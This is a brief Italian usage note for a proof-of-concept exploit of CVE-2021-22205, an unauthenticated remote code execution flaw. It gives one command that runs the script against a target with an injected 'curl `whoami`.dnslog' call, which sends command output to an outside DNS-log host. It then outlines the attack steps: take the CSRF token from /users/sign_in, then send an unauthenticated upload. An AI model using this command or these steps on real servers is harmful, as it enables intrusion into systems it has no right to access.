
CVE-2021-22205 RCE non autorizzato
Versioni interessate:
Utilizzo
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

Ottieni token csrf:

Ottieni il token csrf tramite /users/sign_in, poi usa il precedente PoC di CVE-2021-22205 per creare un pacchetto di upload ed eseguire una richiesta di upload non autenticata, portando infine a RCE.


Riferimenti: